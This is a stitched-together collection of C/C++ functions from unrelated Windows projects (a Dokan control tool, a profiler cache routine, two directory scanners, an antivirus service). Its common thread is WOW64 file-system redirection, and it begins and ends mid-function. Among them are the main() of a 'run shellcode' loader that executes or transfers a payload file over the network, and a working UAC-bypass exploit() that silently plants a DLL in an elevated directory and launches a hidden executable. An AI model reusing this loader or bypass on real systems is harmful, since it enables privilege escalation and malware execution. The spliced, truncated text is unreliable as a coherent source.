    fprintf(stdout, "Dokan version : %d\n", DokanVersion());
    fprintf(stdout, "Dokan driver version : 0x%lx\n", DokanDriverVersion());
    return EXIT_SUCCESS;

  } else if (GetOption(argc, argv, 1) == L'u' && argc == 3) {
    return Unmount(argv[2], FALSE);

  } else if (GetOption(argc, argv, 1) == L'u' &&
             GetOption(argc, argv, 3) == L'f' && argc == 4) {
    return Unmount(argv[2], TRUE);

  } else if (argc < 3 || wcslen(argv[1]) != 2 || argv[1][0] != L'/') {
    // From here on argv[1] is "/<letter>" and argv[2] exists.
    return ShowUsage();
  }

  type = towlower(argv[2][0]);

  switch (towlower(argv[1][1])) {
  case L'i':
    if (type == L'd') {
      return InstallDriver(driverFullPath);
    } else if (type == L'n') {
      if (DokanNetworkProviderInstall())
        fprintf(stdout, "network provider install ok\n");
      else
        fprintf(stderr, "network provider install failed\n");
    }
    break;

  case L'r':
    if (type == L'd') {
      return DeleteDokanService(DOKAN_DRIVER_SERVICE);
    } else if (type == L'n') {
      if (DokanNetworkProviderUninstall())
        fprintf(stdout, "network provider remove ok\n");
      else
        fprintf(stderr, "network provider remove failed\n");
    }
    break;

  case L'd':
    // Anything but a digit is ignored without a message.
    if (L'0' <= type && type <= L'9') {
      ULONG mode = type - L'0';
      if (DokanSetDebugMode(mode)) {
        fprintf(stdout, "set debug mode ok\n");
      } else {
        fprintf(stderr, "set debug mode failed\n");
      }
    }
    break;

  case L'l': {
    ULONG nbRead = 0;
    // The whole table lives on the stack of wmain.
    DOKAN_CONTROL dokanControl[DOKAN_MAX_INSTANCES];
    if (DokanGetMountPointList(dokanControl, DOKAN_MAX_INSTANCES, FALSE,
                               &nbRead)) {
      fwprintf(stdout, L" Mount points: %d\n", nbRead);
      for (unsigned int p = 0; p < nbRead; ++p) {
        // NOTE(review): p is unsigned but is printed with %d.
        fwprintf(stdout, L" %d# MountPoint: %s - UNC: %s - DeviceName: %s\n",
                 p, dokanControl[p].MountPoint, dokanControl[p].UNCName,
                 dokanControl[p].DeviceName);
      }
    } else {
      fwprintf(stderr, L" Cannot retrieve mount point list.\n");
    }
  } break;

  default:
    fprintf(stderr, "unknown option\n");
  }

  return EXIT_SUCCESS;
}
//returns true if the caching was successful //filePath is the original path, altSource is the user-specified source for the filePath bool CacheFile(const QString& sessionDir, QString filePath, const QString& altSource, bool symsToo) { CacheFileMap cache; //check for current cache if (!ReadSessionCacheFileMap(sessionDir, cache)) { return false; } #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS PVOID oldValue = nullptr; BOOL doRedirect = false; IsWow64Process(GetCurrentProcess(), &doRedirect); if (doRedirect) { doRedirect = (BOOL) Wow64DisableWow64FsRedirection(&oldValue); } #endif //if needed, create cache sub-dir QString cachePath = sessionDir + "/cache/"; QDir dir(cachePath); if (!dir.exists()) { dir.mkpath(cachePath); } //determine cache name filePath.remove(QChar('\0')); QFileInfo original(filePath); int additional = 1; QString existTest = cachePath + original.fileName(); while (QFile::exists(existTest)) { existTest = cachePath + original.baseName() + " " + QString::number(additional++) + "." + original.completeSuffix(); } //copy to cache QString base = altSource.isEmpty() ? filePath : altSource; if (!QFile::copy(base, existTest)) { #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS if (doRedirect) { Wow64RevertWow64FsRedirection(oldValue); } #endif return false; } if (symsToo) { QFileInfo baseInfo(base); QString symBase = baseInfo.absolutePath() + "/" + baseInfo.baseName() + ".pdb"; baseInfo.setFile(existTest); QString symCopy = baseInfo.absolutePath() + "/" + baseInfo.baseName() + ".pdb"; QFile::copy(symBase, symCopy); } #if AMDT_BUILD_TARGET == AMDT_WINDOWS_OS if (doRedirect) { Wow64RevertWow64FsRedirection(oldValue); } #endif //add to cache map cache.insert(filePath, existTest); return WriteSessionCacheFileMap(sessionDir, cache); } //CacheFile
/* Entry point.
 *
 * Fills args with default values, lets parse_args() override them from the
 * command line, checks the optional input file and then either hands the
 * file to xfile() (mode RSC_EXEC) or sets up the network and runs ssr() or
 * csr() depending on the mode. Always returns 0.
 */
int main (int argc, char *argv[])
{
  args_t args;
  struct stat st;

#ifdef WIN
  /* NOTE(review): in this listing the declaration of OldValue appears behind
   * a comment marker, so OldValue is not declared in this function as shown;
   * presumably it is declared elsewhere or the marker is an artefact of the
   * listing. Confirm against the original file. */
  // PVOID OldValue=NULL;
  WSADATA wsa;

  /* The results of both calls are ignored, and neither the redirection state
   * nor Winsock is released anywhere in this function. */
  Wow64DisableWow64FsRedirection (&OldValue);
  WSAStartup(MAKEWORD(2,0), &wsa);
#endif

  /* Unbuffered output so messages appear immediately. */
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  memset (&args, 0, sizeof(args));

  // set default parameters
  args.address = NULL;
  args.file = NULL;
  args.ai_family = AF_INET;
  args.port = DEFAULT_PORT;
  args.port_nbr = atoi(args.port);
  args.mode = -1;
  args.tx_mode = -1;
  args.sim = 0;
  args.dbg = 0;

  printf ("\n[ run shellcode v0.1\n");

  parse_args(&args, argc, argv);

  // check if we have file parameter and it accessible
  if (args.file!=NULL) {
    if (stat (args.file, &st)) {
      printf ("[ unable to access %s\n", args.file);
      return 0;
    } else {
      /* Files larger than MAX_BUFSIZ are refused. */
      if (st.st_size > MAX_BUFSIZ) {
        printf ("[ %s exceeds MAX_BUFSIZ of %i bytes\n", args.file, MAX_BUFSIZ);
        return 0;
      }
    }
  }

  // if mode is executing
  if (args.mode==RSC_EXEC) {
    if (args.file!=NULL) {
      xfile(&args);
      return 0;
    } else {
      printf ("\n[ you've used -x without supplying file with -f");
      return 0;
    }
  }
  if (init_network(&args)) {
    // receive when no file was given, send otherwise
    args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;

    // if mode is -1, we listen for incoming connections
    if (args.mode == -1) {
      args.mode=RSC_SERVER;
    }
    // if no file specified, set to receive one
    /* NOTE(review): tx_mode was assigned just above, so this branch only
     * matters if one of the RSC_* constants equals -1. */
    if (args.tx_mode == -1) {
      args.tx_mode=RSC_RECV;
    }
    if (args.mode==RSC_SERVER) {
      ssr (&args);
    } else {
      csr (&args);
    }
  }
  return 0;
}
// Entry point of jdots.
//
// Parses the options, resolves the target directory (the current directory
// when none is given), scans it with WOW64 file system redirection disabled,
// then sorts the results by name, displays them and writes a KML file.
// Returns 1 after printing usage, when the target directory cannot be entered
// or when the results list reports no memory, and 0 otherwise.
int wmain( int argc, LPTSTR argv[] )
{
    // Vars declarations
    int targetDirInd = 0;
    BOOL flags[ MAX_OPTIONS ] = { 0 };
    TCHAR workDir[ MAX_PATH ] = { 0 };
    TCHAR targetDir[ MAX_PATH ] = { 0 };
    DWORD workLength = 0;
    List resultsList = { 0 };
    Item resultsItem = { 0 };
    PVOID oldValueWow64 = NULL;
    BOOL wow64Disabled = FALSE;
    TCHAR* ptTchar = NULL;

    // Get index of first argument after options
    // Also determine which options are active
    targetDirInd = Options( argc, argv, TEXT( "h" ), &flags[ FL_HELP ], NULL );

    // Get current working dir
    workLength = GetCurrentDirectory( _countof( workDir ), workDir );

    // Validate target dir
    if ( ( argc > targetDirInd + 1 ) || flags[ FL_HELP ] )
    {
        // More than one target or
        // target with gaps (no quotes) specified or
        // asked for help

        // Print usage
        wprintf_s( TEXT( "\n Usage: jdots [options] [target dir]\n\n" ) );
        wprintf_s( TEXT( " Options:\n\n" ) );
        wprintf_s( TEXT( " -h : Print usage\n\n" ) );
        wprintf_s( TEXT( " If no target dir is specified, then the current working dir will be used\n" ) );

        return 1;
    }
    else if ( ( argc < targetDirInd + 1 ) && ( workLength <= MAX_PATH - 3 ) )
    {
        // No target specified --> assume current dir
        wcscpy_s( targetDir, MAX_PATH, workDir );
    }
    else if ( argc == targetDirInd + 1 )
    {
        // One target specified

        // Validate target dir starting with '\'
        if ( argv[ targetDirInd ][ 0 ] == '\\' )
        {
            // Fetch drive letter from working dir (its first two characters)
            wcsncpy_s( targetDir, MAX_PATH, workDir, 2 );
        }

        // Append passed dir to target dir
        // NOTE(review): the argument comes straight from the command line; if
        // the result does not fit in MAX_PATH, wcscat_s invokes the CRT
        // invalid-parameter handler instead of returning here.
        wcscat_s( targetDir, MAX_PATH, argv[ targetDirInd ] );
    }
    // If no branch above matched, targetDir is still empty at this point.

    // Set up absolute target dir --> resolve '.' and '..' in target dir
    if ( !SetCurrentDirectory( targetDir ) )
    {
        ReportError( TEXT( "\nTarget directory not found.\n" ), 0, TRUE );
        return 1;
    }

    // Display absolute target dir
    GetCurrentDirectory( _countof( targetDir ), targetDir );
    wprintf_s( TEXT( "\n Target dir: \"%s\"\n\n" ), targetDir );

    // Initialize results list
    InitializeList( &resultsList );

    // Initialize list's name (measurement name): the last path component,
    // or an empty name when the path holds no backslash
    ptTchar = wcsrchr( targetDir, L'\\' );
    if ( ptTchar != NULL )
        IniListName( &resultsList, ptTchar + 1 );
    else
        IniListName( &resultsList, TEXT( "" ) );

    // Check mem availability
    if ( ListIsFull( &resultsList ) )
    {
        wprintf_s( TEXT( "\nNo memory available!\n" ) );
        return 1;
    }

    // Disable file system redirection, for the scan only; the result is kept
    // so that the revert below runs only if the disable call succeeded
    wow64Disabled = Wow64DisableWow64FsRedirection( &oldValueWow64 );

    // Scan target dir
    scanDir( targetDir, &resultsList, &resultsItem );

    // Re-enable redirection
    if ( wow64Disabled )
    {
        if ( !( Wow64RevertWow64FsRedirection( oldValueWow64 ) ) )
            ReportError( TEXT( "Re-enable redirection failed." ), 1, TRUE );
    }

    // Display results
    if ( ListIsEmpty( &resultsList ) )
        wprintf_s( TEXT( "\nNo data.\n\n" ) );
    else
    {
        // Sort by name (a to Z)
        SortList( &resultsList, cmpItemsName );

        // Display sorted results
        showResults( &resultsList, &resultsItem );

        // Generate KML file
        outputKml( &resultsList );
    }

    // Housekeeping
    EmptyTheList( &resultsList );

    return 0;
}
// Entry point of dgl.
//
// Parses the options, resolves the target directory (the current directory
// when none is given), scans it with WOW64 file system redirection disabled,
// sorts the results according to the first active sort option, displays them
// and finally prints the elapsed time.
// Returns 1 after printing usage, when the target directory cannot be entered
// or when the results list reports no memory, and 0 otherwise.
int wmain( int argc, LPTSTR argv[] )
{
    // Declare vars
    TCHAR targetDir[ MAX_PATH ] = { 0 };
    TCHAR workDir[ MAX_PATH ] = { 0 };
    DWORD targetLength = 0;   // not used in this function
    DWORD workLength = 0;
    Item resultsItem = { 0 };
    List resultsList = { 0 };
    LARGE_INTEGER freq;
    LARGE_INTEGER startingT, endingT, elapsedTicks;
    BOOL flags[ MAX_OPTIONS ] = { 0 };
    int targetDirInd = 0;
    PVOID oldValueWow64 = NULL;
    BOOL wow64Disabled = FALSE;

    // Fetch frequency & initial ticks count
    QueryPerformanceFrequency( &freq );
    QueryPerformanceCounter( &startingT );

    // Get index of first argument after options
    // Also determine which options are active
    targetDirInd = Options( argc, argv, TEXT( "sfdmnthb" ),
        &flags[ FL_SIZE ], &flags[ FL_FILES ], &flags[ FL_DIRS ],
        &flags[ FL_MODIF ], &flags[ FL_NAME ], &flags[ FL_TYPE ],
        &flags[ FL_HELP ], &flags[ FL_DBG ], NULL );

    // Get current working dir
    workLength = GetCurrentDirectory( _countof( workDir ), workDir );

    // Validate target dir
    if ( ( argc > targetDirInd + 1 ) || flags[ FL_HELP ] )
    {
        // More than one target or
        // target with gaps (no quotes) specified or
        // asked for help

        // Print usage
        wprintf_s( TEXT( "\n Usage: dgl [options] [target dir]\n\n" ) );
        wprintf_s( TEXT( " Options:\n\n" ) );
        wprintf_s( TEXT( " -s : Sort by size [bytes] (default)\n" ) );
        wprintf_s( TEXT( " -f : Sort by files count (descending)\n" ) );
        wprintf_s( TEXT( " -d : Sort by dirs count (descending)\n" ) );
        wprintf_s( TEXT( " -m : Sort by date modified (latest to earliest)\n" ) );
        wprintf_s( TEXT( " -n : Soft by name (a to Z)\n" ) );
        wprintf_s( TEXT( " -t : Sort by type (<DIR>, <LIN>, file)\n" ) );
        wprintf_s( TEXT( " -h : Print usage\n" ) );
        wprintf_s( TEXT( " -b : Extended output (debug purposes)\n\n" ) );
        wprintf_s( TEXT( " If no option is specidied, then '-s' will be used\n" ) );
        wprintf_s( TEXT( " If no target dir is specified, then the current working dir will be used\n" ) );

        return 1;
    }
    else if ( ( argc < targetDirInd + 1 ) && ( workLength <= MAX_PATH - 3 ) )
    {
        // No target specified --> assume current dir
        wcscpy_s( targetDir, MAX_PATH, workDir );
    }
    else if ( argc == targetDirInd + 1 )
    {
        // One target specified

        // Validate target dir starting with '\'
        if ( argv[ targetDirInd ][ 0 ] == '\\' )
        {
            // Fetch drive letter from working dir (its first two characters)
            wcsncpy_s( targetDir, MAX_PATH, workDir, 2 );
        }

        // Append passed dir to target dir
        // NOTE(review): the argument comes straight from the command line; if
        // the result does not fit in MAX_PATH, wcscat_s invokes the CRT
        // invalid-parameter handler instead of returning here.
        wcscat_s( targetDir, MAX_PATH, argv[ targetDirInd ] );
    }
    // If no branch above matched, targetDir is still empty at this point.

    // Set up absolute target dir --> resolve '.' and '..' in target dir
    if ( !SetCurrentDirectory( targetDir ) )
    {
        ReportError( TEXT( "\nTarget directory not found.\n" ), 0, TRUE );
        return 1;
    }

    // Display absolute target dir
    GetCurrentDirectory( _countof( targetDir ), targetDir );
    wprintf_s( TEXT( "\n Target dir: \"%s\"\n\n" ), targetDir );

    // Initialize results list
    InitializeList( &resultsList );
    if ( ListIsFull( &resultsList ) )
    {
        wprintf_s( TEXT( "\nNo memory available!\n" ) );
        return 1;
    }

    // Debug output
    if ( flags[ FL_DBG ] )
        wprintf_s( TEXT( " %s\n" ), targetDir );

    // Disable file system redirection, for the scan only; the result is kept
    // so that the revert below runs only if the disable call succeeded
    wow64Disabled = Wow64DisableWow64FsRedirection( &oldValueWow64 );

    // Scan target dir
    scanDir( targetDir, &resultsList, &resultsItem, TRUE, flags[ FL_DBG ] );

    // Re-enable redirection
    if ( wow64Disabled )
    {
        if ( !( Wow64RevertWow64FsRedirection( oldValueWow64 ) ) )
            ReportError( TEXT( "Re-enable redirection failed." ), 1, TRUE );
    }

    // Display results
    if ( ListIsEmpty( &resultsList ) )
        wprintf_s( TEXT( "\nNo data.\n\n" ) );
    else
    {
        // Sort results
        // if-else chain determines sorting priority
        // one sorting type high prio excludes low prio types
        // NOTE(review): flags[ FL_TYPE ] is parsed and listed in the usage
        // text but has no branch here, so '-t' sorts by size.
        if ( flags[ FL_SIZE ] )
            // Sort by size (descending)
            SortList( &resultsList, cmpItemsSizeCount );
        else if ( flags[ FL_FILES ] )
            // Sort by files count (descending)
            SortList( &resultsList, cmpItemsFilesCount );
        else if ( flags[ FL_DIRS ] )
            // Sort by dirs count (descending)
            SortList( &resultsList, cmpItemsDirsCount );
        else if ( flags[ FL_MODIF ] )
            // Sort by modification date (latest to earliest)
            SortList( &resultsList, cmpItemsLastWriteTime );
        else if ( flags[ FL_NAME ] )
            // Sort by name (a to Z)
            SortList( &resultsList, cmpItemsName );
        else
            // Default: sort by size (descending)
            SortList( &resultsList, cmpItemsSizeCount );

        // Debug output
        if ( flags[ FL_DBG ] )
            wprintf_s( TEXT( "\n" ) );

        // Display sorted results
        showResults( &resultsList, &resultsItem );
    }

    // Housekeeping
    EmptyTheList( &resultsList );

    // Fetch final ticks count
    QueryPerformanceCounter( &endingT );

    // Calc elapsed ticks
    elapsedTicks.QuadPart = endingT.QuadPart - startingT.QuadPart;

    // Calc and display elapsed time
    calcDispElapTime( &elapsedTicks.QuadPart, &freq.QuadPart );

    return 0;
}
/* Entry point of the service executable.
 *
 * The first command line argument selects a maintenance or test action;
 * without a recognised argument the process registers ServiceMain with the
 * service control dispatcher.
 *
 * NOTE(review): every option is matched with strncmp() over a fixed prefix
 * length, so any argument that merely starts with an option name is accepted
 * and the order of the tests decides between options that share a prefix
 * ("--testGUI" before "--test", "--installboot" before "--install").
 *
 * Returns EXIT_SUCCESS / EXIT_FAILURE for most actions, 0 for "--conf", and
 * -1 / -2 when the redirection calls of "--testGUI" fail.
 */
int main(int argc, char ** argv)
{
	int ret = 0;
	struct a6o_report report = {0};	/* only referenced inside an "#if 0" section */
	PVOID OldValue = NULL;

	if (argc >= 2 && strncmp(argv[1],"--conf",6) == 0 ) {
		// TODO :: https://msdn.microsoft.com/fr-fr/library/windows/desktop/ms724072%28v=vs.85%29.aspx
		//conf_poc_windows( );
		return 0;
	}

	// Only for test purposes (command line)
	if (argc >= 2 && strncmp(argv[1], "--disable_rt", 12) == 0) {
		//disable_onaccess( );
		return EXIT_SUCCESS;
	}

	// Sends one sample notification of each level through send_notif.
	if (argc >= 2 && strncmp(argv[1], "--notify", 8) == 0) {
		a6o_notify_set_handler((a6o_notify_handler_t)send_notif);
		a6o_notify(NOTIF_INFO,"Service started!");
		a6o_notify(NOTIF_WARNING,"Malware detected :: [%s]","TrojanFake");
		a6o_notify(NOTIF_ERROR,"An error occured during scan !!");
		return EXIT_SUCCESS;
	}

	// Only for test purposes (command line) complete test = GUI + driver.
	// This is the only action that changes the file system redirection state.
	if ( argc >=2 && strncmp(argv[1],"--testGUI",9) == 0 ){

		DisplayBanner();

		a6o_notify_set_handler((a6o_notify_handler_t)send_notif);

		// The service is not launched at all when redirection cannot be disabled.
		if (Wow64DisableWow64FsRedirection(&OldValue) == FALSE) {
			return -1;
		}

		/* (FD) added to get all log messages */
		a6o_log_set_handler(ARMADITO_LOG_LEVEL_DEBUG, a6o_log_default_handler, NULL);

		ret = LaunchCmdLineService(GUI_ONLY);

		if (Wow64RevertWow64FsRedirection(OldValue) == FALSE ){
			// Failure to re-enable redirection should be considered
			// a criticial failure and execution aborted.
			return -2;
		}

		if (ret < 0) {
			return EXIT_FAILURE;
		}
		return EXIT_SUCCESS;
	}

	// Only for test purposes (command line) complete test = GUI + driver.
	if ( argc >=2 && strncmp(argv[1],"--test",6) == 0 ){

		DisplayBanner( );

		a6o_notify_set_handler((a6o_notify_handler_t)send_notif);

		ret = LaunchCmdLineService(SVC_MODE);
		if (ret < 0) {
			return EXIT_FAILURE;
		}
		return EXIT_SUCCESS;
	}

	// Only for test purposes (command line); the body is compiled out.
	if ( argc >=2 && strncmp(argv[1],"--register",10) == 0 ){
#if 0
		ret = register_av( );
		if (ret < 0) {
			return EXIT_FAILURE;
		}
#endif
		return EXIT_SUCCESS;
	}

	// Only for test purposes (command line); the body is compiled out.
	if ( argc >=2 && strncmp(argv[1],"--crypt",7) == 0 ){
#if 0
		if (argv[2] == NULL) {
			printf("[-] Error :: --crypt option :: missing parameter [filename]\n");
			return EXIT_FAILURE;
		}

		ret = verify_file_signature(argv[2],SIGNATURE_FILE);
		if (ret < 0) {
			return EXIT_FAILURE;
		}
#endif
		return EXIT_SUCCESS;
	}

	// Only for test purposes (command line); the body is compiled out.
	// NOTE(review): only 11 of the 12 characters of "--quarantine" are compared.
	if ( argc >=3 && strncmp(argv[1],"--quarantine",11) == 0 ){
#if 0
		ret = MoveFileInQuarantine(argv[2], report);
		if (ret < 0) {
			return EXIT_FAILURE;
		}
#endif
		return EXIT_SUCCESS;
	}

	if ( argc >=2 && strncmp(argv[1],"--quarantine",11) == 0 ){
#if 0
		ret = EnumQuarantine();
		if (ret < 0) {
			return EXIT_FAILURE;
		}
#endif
		return EXIT_SUCCESS;
	}

	if ( argc >=2 && strncmp(argv[1],"--restore",9) == 0 ){
#if 0
		ret = ui_restore_quarantine_file(argv[1]);
		if (ret < 0) {
			return EXIT_FAILURE;
		}
#endif
		return EXIT_SUCCESS;
	}

	// NOTE(review): unreachable as written, because the "--restore" test
	// above (argc >= 2) already returns for every case this one would accept.
	if ( argc >=3 && strncmp(argv[1],"--restore",9) == 0 ){
#if 0
		ret = RestoreFileFromQuarantine(argv[2]);
		if (ret < 0) {
			return EXIT_FAILURE;
		}
#endif
		return EXIT_SUCCESS;
	}

	if ( argc >=2 && strncmp(argv[1],"--updatedb",10) == 0 ){

		DisplayBanner( );

		update_modules_db(NULL);

		return EXIT_SUCCESS;
	}

	if ( argc >=2 && strncmp(argv[1],"--info",6) == 0 ){

		if (get_av_info() < 0) {
			return EXIT_FAILURE;
		}

		return EXIT_SUCCESS;
	}

	// command line parameter "--installboot", install the service with
	// SERVICE_AUTO_START.
	if (argc >= 2 && strncmp(argv[1], "--installboot", 13) == 0){

		DisplayBanner();

		ret = ServiceInstall(SERVICE_AUTO_START);
		if (ret < 0) {
			return EXIT_FAILURE;
		}
		return EXIT_SUCCESS;
	}

	// command line parameter "--install", install the service with
	// SERVICE_DEMAND_START.
	if ( argc >=2 && strncmp(argv[1],"--install",9) == 0 ){

		DisplayBanner( );

		ret = ServiceInstall(SERVICE_DEMAND_START);
		if (ret < 0) {
			return EXIT_FAILURE;
		}
		return EXIT_SUCCESS;
	}

	// command line parameter "--uninstall", uninstall the service.
	// The result of ServiceRemove() is stored but not checked.
	if ( argc >=2 && strncmp(argv[1],"--uninstall",11) == 0 ){
		DisplayBanner( );
		ret = ServiceRemove( );
		return EXIT_SUCCESS;
	}

	// command line parameter "--stop", stop the service.
	if ( argc >=2 && strncmp(argv[1],"--stop",6) == 0 ){
		ServiceStop();
		return EXIT_SUCCESS;
	}

	if ( argc >=2 && strncmp(argv[1],"--start",7) == 0 ){
		ServiceLaunch( );
		return EXIT_SUCCESS;
	}

	if ( argc >=2 && strncmp(argv[1],"--pause",7) == 0 ){
		ServicePause( );
		return EXIT_SUCCESS;
	}

	if ( argc >=2 && strncmp(argv[1],"--continue",10) == 0 ){
		ServiceContinue( );
		return EXIT_SUCCESS;
	}

	//ServiceLaunchAction( );
	// put this part in ServiceLaunchAction function.

	SERVICE_TABLE_ENTRY DispatchTable[] = {
		{ SVCNAME, (LPSERVICE_MAIN_FUNCTION) ServiceMain },
		{ NULL, NULL }
	};

	// This call returns when the service has stopped. A failure is ignored
	// and the process still exits with EXIT_SUCCESS.
	if (!StartServiceCtrlDispatcher(DispatchTable)) {
		//SvcReportEvent(TEXT("StartServiceCtrlDispatcher"));
		//printf("[i] StartServiceCtrlDispatcher :: %d\n",GetLastError());
	}

	return EXIT_SUCCESS;
}
/*
 * Copies a DLL into a target directory through the shell's IFileOperation
 * COM object, launches an executable from that directory with a hidden
 * window, then removes the copied DLL again.
 *
 * paths supplies every file-system location used here: the staged DLL
 * (szDllTempPath), the destination directory (szElevDir), the name the DLL
 * gets there (szElevDll), the executable to start (szElevExeFull) and the
 * two candidate paths used for the clean-up delete (szElevDllFull,
 * szElevDirSysWow64).
 *
 * The function name and the [BYPASSUACINJ] log tag suggest this is the
 * file-copy stage of a UAC bypass. What lets the copy proceed without a
 * consent prompt is not visible in this function (presumably a property of
 * the process it runs in; confirm against the caller).
 *
 * Sequence observable from the code, useful when building detections: a DLL
 * appears in szElevDir via a shell file operation flagged silent, a child
 * process is started from that directory with SW_HIDE, and the DLL is
 * deleted again after the child exits or after the 10-second wait expires.
 */
void exploit(BypassUacPaths const * const paths)
{
	const wchar_t *szElevArgs = L"";
	const wchar_t *szEIFOMoniker = NULL;	// never read in this function
	PVOID OldValue = NULL;			// receives the previous WOW64 redirection state
	IFileOperation *pFileOp = NULL;
	IShellItem *pSHISource = 0;
	IShellItem *pSHIDestination = 0;
	IShellItem *pSHIDelete = 0;
	BOOL bComInitialised = FALSE;		// set once CoInitialize succeeded, so cleanup knows to uninitialize

	const IID *pIID_EIFO = &__uuidof(IFileOperation);
	const IID *pIID_EIFOClass = &__uuidof(FileOperation);
	const IID *pIID_ShellItem2 = &__uuidof(IShellItem2);

	// Every path used below is written to the debug log first.
	dprintf("[BYPASSUACINJ] szElevDir = %S", paths->szElevDir);
	dprintf("[BYPASSUACINJ] szElevDirSysWow64 = %S", paths->szElevDirSysWow64);
	dprintf("[BYPASSUACINJ] szElevDll = %S", paths->szElevDll);
	dprintf("[BYPASSUACINJ] szElevDllFull = %S", paths->szElevDllFull);
	dprintf("[BYPASSUACINJ] szElevExeFull = %S", paths->szElevExeFull);
	dprintf("[BYPASSUACINJ] szDllTempPath = %S", paths->szDllTempPath);

	// Single-pass loop: every failure uses `break` to jump to the shared cleanup below.
	do
	{
		if (CoInitialize(NULL) != S_OK)
		{
			dprintf("[BYPASSUACINJ] Failed to initialize COM");
			break;
		}

		bComInitialised = TRUE;

		if (CoCreateInstance(*pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_SERVER | CLSCTX_INPROC_HANDLER, *pIID_EIFO, (void**)&pFileOp) != S_OK)
		{
			dprintf("[BYPASSUACINJ] Couldn't create EIFO instance");
			break;
		}

		// The FOF_* flags suppress confirmation, error and progress UI; the FOFX_*
		// flags ask for the operation to run elevated and skip copy hooks.
		if (pFileOp->SetOperationFlags(FOF_NOCONFIRMATION | FOF_NOERRORUI | FOF_SILENT | FOFX_SHOWELEVATIONPROMPT | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION) != S_OK)
		{
			dprintf("[BYPASSUACINJ] Couldn't Set operating flags on file op.");
			break;
		}

		if (SHCreateItemFromParsingName((PCWSTR)paths->szDllTempPath, NULL, *pIID_ShellItem2, (void**)&pSHISource) != S_OK)
		{
			dprintf("[BYPASSUACINJ] Unable to create item from name (source)");
			break;
		}

		if (SHCreateItemFromParsingName(paths->szElevDir, NULL, *pIID_ShellItem2, (void**)&pSHIDestination) != S_OK)
		{
			dprintf("[BYPASSUACINJ] Unable to create item from name (destination)");
			break;
		}

		// Queue the copy; nothing touches the disk until PerformOperations().
		if (pFileOp->CopyItem(pSHISource, pSHIDestination, paths->szElevDll, NULL) != S_OK)
		{
			dprintf("[BYPASSUACINJ] Unable to prepare copy op for elev dll");
			break;
		}

		/* Copy the DLL file to the target folder */
		if (pFileOp->PerformOperations() != S_OK)
		{
			dprintf("[BYPASSUACINJ] Unable to copy elev dll");
			break;
		}

		/* Execute the target binary */
		SHELLEXECUTEINFOW shinfo;
		ZeroMemory(&shinfo, sizeof(shinfo));
		shinfo.cbSize = sizeof(shinfo);
		shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;	// keep the process handle so it can be waited on
		shinfo.lpFile = paths->szElevExeFull;
		shinfo.lpParameters = szElevArgs;
		shinfo.lpDirectory = paths->szElevDir;	// working directory is the folder the DLL was copied into
		shinfo.nShow = SW_HIDE;			// no visible window for the child process

		// NOTE(review): redirection is switched off for this thread here and no
		// matching Wow64RevertWow64FsRedirection call is visible in this function,
		// so the state stays changed after it returns.
		Wow64DisableWow64FsRedirection(&OldValue);

		if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL)
		{
			// Bounded wait (10 s) before the clean-up below runs.
			WaitForSingleObject(shinfo.hProcess, 10000);
			CloseHandle(shinfo.hProcess);
		}

		// First clean-up attempt: delete the copied DLL by its full path.
		if (S_OK != SHCreateItemFromParsingName(paths->szElevDllFull, NULL, *pIID_ShellItem2, (void**)&pSHIDelete) || NULL == pSHIDelete)
		{
			dprintf("[BYPASSUACINJ] Failed to create item from parsing name (delete)");
			break;
		}

		if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL))
		{
			dprintf("[BYPASSUACINJ] Failed to prepare op for delete");
			break;
		}

		if (pFileOp->PerformOperations() == S_OK)
		{
			dprintf("[BYPASSUACINJ] Successfully deleted dll");
			// bail out this point because we don't need to keep trying to delete
			break;
		}

		// SAFERELEASE is defined elsewhere; presumably it releases the interface
		// and resets the pointer so it can be reused below (confirm).
		SAFERELEASE(pSHIDelete);

		// If we fail to delete the file probably SYSWOW64 process so use SYSNATIVE to get the correct path
		// DisableWOW64Redirect fails at this? Possibly due to how it interacts with UAC see:
		// http://msdn.microsoft.com/en-us/library/windows/desktop/aa384187(v=vs.85).aspx
		// Second clean-up attempt, using the alternate path from paths->szElevDirSysWow64.
		if (S_OK != SHCreateItemFromParsingName(paths->szElevDirSysWow64, NULL, *pIID_ShellItem2, (void**)&pSHIDelete) || NULL == pSHIDelete)
		{
			dprintf("[BYPASSUACINJ] Failed to create item from parsing name for delete (shellitem2)");
			break;
		}

		if (S_OK != pFileOp->DeleteItem(pSHIDelete, NULL))
		{
			dprintf("[BYPASSUACINJ] Failed to prepare op for delete (shellitem2)");
			break;
		}

		if (pFileOp->PerformOperations() == S_OK)
		{
			dprintf("[BYPASSUACINJ] Successfully deleted DLL in target directory from SYSWOW64 process");
		}
		else
		{
			// Both delete attempts failed: the copied DLL is left behind in the target directory.
			dprintf("[BYPASSUACINJ] Failed to delete target DLL");
		}

	} while (0);

	// Shared cleanup for the success path and every early break.
	SAFERELEASE(pSHIDelete);
	SAFERELEASE(pSHIDestination);
	SAFERELEASE(pSHISource);
	SAFERELEASE(pFileOp);

	if (bComInitialised)
	{
		CoUninitialize();
	}
}
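/*
 * dokanctl entry point: parses the command line and dispatches to the
 * version / mount-list / unmount / install / remove / debug-mode actions.
 *
 * The mounter path is derived from this executable's own location and the
 * driver path from DOKAN_DRIVER_FULL_PATH. Both are later handed to the
 * install helpers, so a failed or truncated path lookup is recorded and the
 * install actions refuse to run with such a path instead of registering a
 * service or driver with an empty or cut-off image path.
 *
 * Returns EXIT_SUCCESS or EXIT_FAILURE (or whatever the dispatched helper
 * returns).
 */
int __cdecl wmain(int argc, PWCHAR argv[]) {
  static const WCHAR mounterName[] = L"\\mounter.exe";
  WCHAR fileName[MAX_PATH] = {0};
  WCHAR driverFullPath[MAX_PATH] = {0};
  WCHAR mounterFullPath[MAX_PATH] = {0};
  WCHAR *lastSeparator;
  WCHAR type;
  DWORD copied;
  BOOL mounterPathValid = FALSE;
  BOOL driverPathValid = FALSE;
  PVOID wow64OldValue = NULL;

  DokanUseStdErr(TRUE); // Set dokan library debug output

  // Disable system32 redirection so a 32-bit build sees the native system
  // directory. The state is not restored because every path below ends the
  // process.
  Wow64DisableWow64FsRedirection(&wow64OldValue);

  // setlocale(LC_ALL, "");

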